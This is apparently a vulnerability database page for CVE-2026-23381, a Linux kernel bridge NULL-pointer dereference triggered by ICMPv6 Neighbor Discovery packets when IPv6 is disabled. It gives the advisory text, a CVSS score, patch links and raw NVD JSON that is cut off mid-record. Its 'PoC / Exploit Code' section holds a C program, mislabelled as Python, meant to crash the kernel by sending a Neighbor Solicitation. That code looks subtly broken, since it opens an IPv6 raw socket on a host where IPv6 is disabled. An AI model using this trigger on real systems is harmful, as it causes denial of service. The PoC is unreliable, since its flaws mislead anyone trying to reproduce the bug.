CVE-2026-23381

Description

In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix nd_tbl NULL dereference when IPv6 is disabled When booting with the 'ipv6.disable=1' parameter, the nd_tbl is never initialized because inet6_init() exits before ndisc_init() is called which initializes it. Then, if neigh_suppress is enabled and an ICMPv6 Neighbor Discovery packet reaches the bridge, br_do_suppress_nd() will dereference ipv6_stub->nd_tbl which is NULL, passing it to neigh_lookup(). This causes a kernel NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000268 Oops: 0000 [#1] PREEMPT SMP NOPTI [...] RIP: 0010:neigh_lookup+0x16/0xe0 [...] Call Trace: <IRQ> ? neigh_lookup+0x16/0xe0 br_do_suppress_nd+0x160/0x290 [bridge] br_handle_frame_finish+0x500/0x620 [bridge] br_handle_frame+0x353/0x440 [bridge] __netif_receive_skb_core.constprop.0+0x298/0x1110 __netif_receive_skb_one_core+0x3d/0xa0 process_backlog+0xa0/0x140 __napi_poll+0x2c/0x170 net_rx_action+0x2c4/0x3a0 handle_softirqs+0xd0/0x270 do_softirq+0x3f/0x60 Fix this by replacing IS_ENABLED(IPV6) call with ipv6_mod_enabled() in the callers. This is in essence disabling NS/NA suppression when IPv6 is disabled.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (Stable Branches)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-23381
 * Trigger: Send ICMPv6 Neighbor Discovery packet to bridge interface.
 * Condition: Kernel booted with ipv6.disable=1 and neigh_suppress enabled.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/icmp6.h>
#include <arpa/inet.h>

int main(int argc, char *argv[]) {
    int sockfd;
    struct sockaddr_in6 src_addr, dst_addr;
    char packet[128];
    struct nd_neighbor_solicit *ns;

    // Create raw socket
    sockfd = socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6);
    if (sockfd < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&dst_addr, 0, sizeof(dst_addr));
    dst_addr.sin6_family = AF_INET6;
    // Target the all-nodes multicast address or the bridge IP
    inet_pton(AF_INET6, "ff02::1", &dst_addr.sin6_addr);

    // Construct Neighbor Solicitation packet
    memset(packet, 0, sizeof(packet));
    ns = (struct nd_neighbor_solicit *)packet;
    ns->nd_ns_hdr.icmp6_type = ND_NEIGHBOR_SOLICIT;
    ns->nd_ns_hdr.icmp6_code = 0;
    ns->nd_ns_hdr.icmp6_cksum = 0; // Kernel will calc
    
    // Set a target address (arbitrary link-local)
    inet_pton(AF_INET6, "fe80::1", &ns->nd_ns_target);

    printf("Sending ICMPv6 Neighbor Solicitation...");
    if (sendto(sockfd, packet, sizeof(struct nd_neighbor_solicit), 0, 
               (struct sockaddr *)&dst_addr, sizeof(dst_addr)) < 0) {
        perror("sendto");
    } else {
        printf("Packet sent. Check for kernel panic/Oops.\n");
    }

    close(sockfd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23381
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23381
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23381/
[4] VulDB https://vuldb.com/cve/CVE-2026-23381
[5] https://git.kernel.org/stable/c/20ef5c25422f97dd09d751e5ae6c18406cdc78e6
[6] https://git.kernel.org/stable/c/33dec6f10777d5a8f71c0a200f690da5ae3c2e55
[7] https://git.kernel.org/stable/c/7a894eb5de246d79f13105c55a67381039a24d44
[8] https://git.kernel.org/stable/c/a12cdaa3375f0bd3c8f4e564be7c143529abfe5b
[9] https://git.kernel.org/stable/c/a5c56e65b685360dd3f2278aeff8c21061feb665
[10] https://git.kernel.org/stable/c/a9d712ccfeef737c0e700a4b5b98f310e07b6b60
[11] https://git.kernel.org/stable/c/aa73deb3b6b730ec280d45b3f423bfa9e17bc122
[12] https://git.kernel.org/stable/c/e5e890630533bdc15b26a34bb8e7ef539bdf1322

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23381", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:38.160", "lastModified": "2026-04-24T18:41:47.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix nd_tbl NULL dereference when IPv6 is disabled\n\nWhen booting with the 'ipv6.disable=1' parameter, the nd_tbl is never\ninitialized because inet6_init() exits before ndisc_init() is called\nwhich initializes it. Then, if neigh_suppress is enabled and an ICMPv6\nNeighbor Discovery packet reaches the bridge, br_do_suppress_nd() will\ndereference ipv6_stub->nd_tbl which is NULL, passing it to\nneigh_lookup(). This causes a kernel NULL pointer dereference.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000268\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n [...]\n RIP: 0010:neigh_lookup+0x16/0xe0\n [...]\n Call Trace:\n <IRQ>\n ? neigh_lookup+0x16/0xe0\n br_do_suppress_nd+0x160/0x290 [bridge]\n br_handle_frame_finish+0x500/0x620 [bridge]\n br_handle_frame+0x353/0x440 [bridge]\n __netif_receive_skb_core.constprop.0+0x298/0x1110\n __netif_receive_skb_one_core+0x3d/0xa0\n process_backlog+0xa0/0x140\n __napi_poll+0x2c/0x170\n net_rx_action+0x2c4/0x3a0\n handle_softirqs+0xd0/0x270\n do_softirq+0x3f/0x60\n\nFix this by replacing IS_ENABLED(IPV6) call with ipv6_mod_enabled() in\nthe callers. This is in essence disabling NS/NA suppression when IPv6 is\ndisabled."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: bridge: corrige la desreferencia NULL de nd_tbl cuando IPv6 está deshabilitado\n\nAl arrancar con el parámetro 'ipv6.disable=1', el nd_tbl nunca se inicializa porque inet6_init() sale antes de que se llame a ndisc_init(), que es quien lo inicializa. Luego, si neigh_suppress está habilitado y un paquete ICMPv6 Neighbor Discovery llega al puente, br_do_suppress_nd() desreferenciará ipv6_stub->nd_tbl, que es NULL, pasándolo a neigh_lookup(). Esto causa una desreferencia de puntero NULL del kernel.\n\n BUG: desreferencia de puntero NULL del kernel, dirección: 0000000000000268\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n [...]\n RIP: 0010:neigh_lookup+0x16/0xe0\n [...]\n Rastro de Llamada:\n \n ? neigh_lookup+0x16/0xe0\n br_do_suppress_nd+0x160/0x290 [bridge]\n br_handle_frame_finish+0x500/0x620 [bridge]\n br_handle_frame+0x353/0x440 [bridge]\n __netif_receive_skb_core.constprop.0+0x298/0x1110\n __netif_receive_skb_one_core+0x3d/0xa0\n process_backlog+0xa0/0x140\n __napi_poll+0x2c/0x170\n net_rx_action+0x2c4/0x3a0\n handle_softirqs+0xd0/0x270\n do_softirq+0x3f/0x60\n\nSoluciona esto reemplazando la llamada a IS_ENABLED(IPV6) con ipv6_mod_enabled() en los llamadores. Esto es, en esencia, deshabilitar la supresión de NS/NA cuando IPv6 está deshabilitado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "B17827E3-86FD-498B-B936-E57F1C08BF4A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "mat ... (truncated)